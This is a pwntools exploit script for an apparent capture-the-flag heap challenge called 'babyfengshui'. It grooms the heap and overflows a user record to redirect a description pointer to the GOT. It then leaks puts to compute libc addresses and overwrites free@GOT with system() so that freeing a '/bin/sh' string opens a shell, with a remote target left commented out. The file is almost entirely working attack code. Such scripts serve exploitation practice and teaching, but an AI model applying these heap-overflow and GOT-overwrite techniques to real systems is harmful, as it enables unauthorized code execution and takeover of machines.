from pwn import *
import os
def add_user(desc_size, name, text_len, text):
    """Drive menu action 0 ("add") on the target and answer its four prompts.

    The replies are sent in the order desc_size, name, text_len, text; each
    prompt is only matched on its trailing ':' so the exact wording of the
    target's prompts is not checked here.  The menu banner read before the
    choice is echoed to stdout so the transcript shows where each step ran.
    All arguments are sent as-is (strings, possibly containing binary data).
    """
    banner = p.recvuntil("Action:")
    print(banner)
    p.sendline("0")
    for reply in (desc_size, name, text_len, text):
        p.recvuntil(":")
        p.sendline(reply)
def del_user(index):
    """Drive menu action 1 ("delete") and answer the index prompt with *index*.

    Like add_user, the menu banner is echoed to stdout before the choice is
    sent.  *index* is sent verbatim (a decimal string in this script).
    """
    banner = p.recvuntil("Action:")
    print(banner)
    p.sendline("1")
    p.recvuntil(":")
    p.sendline(index)
def update_user(index, text_len, text):
    """Drive menu action 3 ("update") for user *index*, then answer the
    length and text prompts.

    Unlike add_user/del_user the menu banner is not echoed.  The exploit
    calls this with a packed 4-byte value as *text*, i.e. the "text" is
    binary data written through a pointer that was redirected earlier.
    """
    p.recvuntil("Action:")
    p.sendline("3")
    for reply in (index, text_len, text):
        p.recvuntil(":")
        p.sendline(reply)
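def display_user(index):
    """Drive menu action 2 ("display") for user *index* and return the 4-byte
    value printed as its description, decoded as a little-endian 32-bit int.

    The caller first points the user's description at a GOT entry, so what
    the target prints after the description prompt is really the pointer
    stored there (a libc address).  The expected framing after the prompt's
    ':' is one space followed by exactly four raw bytes.

    Raises ValueError if that framing is not observed: continuing with a
    mis-parsed leak would turn the later GOT overwrite into a crash.
    """
    p.recvuntil("Action:")
    p.sendline("2")
    p.recvuntil(":")
    p.sendline(index)
    p.recvuntil(":")
    name = p.recvline()
    print("[+]name :" + name)
    prompt = p.recvuntil(":")
    print(prompt)
    # recvn() blocks until all 5 bytes are in.  recv(5) may return a short
    # read, and the old split(' ')[1] then silently truncated the address --
    # or picked the wrong piece whenever a leaked byte happened to be 0x20.
    raw = p.recvn(5)
    print(repr(raw))
    if raw[:1] != " ":
        raise ValueError("unexpected leak framing after description prompt: %r" % raw)
    leak_bytes = raw[1:]
    # The target is i386 (GOT entries at 0x0804xxxx), so the word width is a
    # fixed 32 bits; it must not be derived from however many bytes arrived.
    context.bits = 32
    return u32(leak_bytes)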
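# GOT slots of the target binary (no PIE: fixed 0x0804xxxx addresses).
puts_got = 0x0804b024
free_got = 0x0804b010

# Libc addresses observed in a local debug run.  gdb.debug() leaves ASLR
# off by default, so they are stable locally; against a remote target only
# the *differences* between them are used, which is valid only if the remote
# libc is the same build (libc-2.19.so, per the commented-out lines below).
# TODO: derive these from ELF("./libc-2.19.so").symbols / .search("/bin/sh")
# instead of hard-coding them.
LOCAL_PUTS = 0xf7e57950
LOCAL_SYSTEM = 0xf7e30160
LOCAL_BINSH = 0xf7f545db

#os.environ["LD_PRELOAD"] = "libc-2.19.so"
p = gdb.debug("./babyfengshui")
#p= remote("78.46.224.83",1456)
#libc = ELF("./libc-2.19.so")

# Stage 1 -- leak.  Allocate users 0,1,2, free 0, then add a user whose text
# length (300) exceeds its description size (256); the target evidently copies
# by the supplied length, so the write runs past the allocation.  The 288-byte
# run is the challenge's heap layout: presumably it reaches user 1's
# description pointer -- confirm in gdb if the layout changes.
add_user("128", "poorguy", "128", "DUMMY")
add_user("10", "AAAA", "4", "BBBB")
add_user("128", "helperguy", "128", "DUMMY")
del_user("0")
# p32() is fixed-width.  pack() follows context.bits, which display_user()
# rewrites, so the payloads must not depend on that global state.
payload = "A" * 288 + p32(puts_got)
add_user("256", "overwrite", "300", payload)
#update_user("1","300",payload)

print("[+] Leaking libc ")
puts_leak = display_user("1")
print("[+] Leak addr" + hex(puts_leak))
# The low 12 bits of a libc symbol are its page offset and survive ASLR, so a
# leak from the same libc build must agree with the local value.  Anything
# else means the leak was mis-parsed or the target runs a different libc, and
# the GOT overwrite below would only crash the process.
if (puts_leak & 0xfff) != (LOCAL_PUTS & 0xfff):
    raise SystemExit("[-] puts leak %#x does not match expected page offset %#x"
                     % (puts_leak, LOCAL_PUTS & 0xfff))
offset = puts_leak - LOCAL_PUTS
system_address = LOCAL_SYSTEM + offset
# Not used by the overwrite below (the "/bin/sh" string lives in the heap,
# see stage 2); kept for the log.
shell_address = LOCAL_BINSH + offset
print("[+] system addr" + hex(system_address))
print("[+] shell addr " + hex(shell_address))

# Stage 2 -- overwrite.  Same grooming with users 4,5,6, this time pointing
# user 5's description at free@GOT and writing system() over it.  User 6's
# description is "/bin/sh", so the intent is that deleting user 6 turns the
# target's free(description) into system("/bin/sh").
add_user("128", "poorguy", "128", "DUMMY")  # 4th guy
add_user("10", "AAAA", "4", "BBBB")
add_user("128", "helperguy", "128", "/bin/sh\x00")
del_user("4")
payload = "C" * 288 + p32(free_got)
print("[+] Adding user")
add_user("256", "overwrite", "300", payload)
update_user("5", "8", p32(system_address))
print("[+] Deleting user")
del_user("6")
p.interactive()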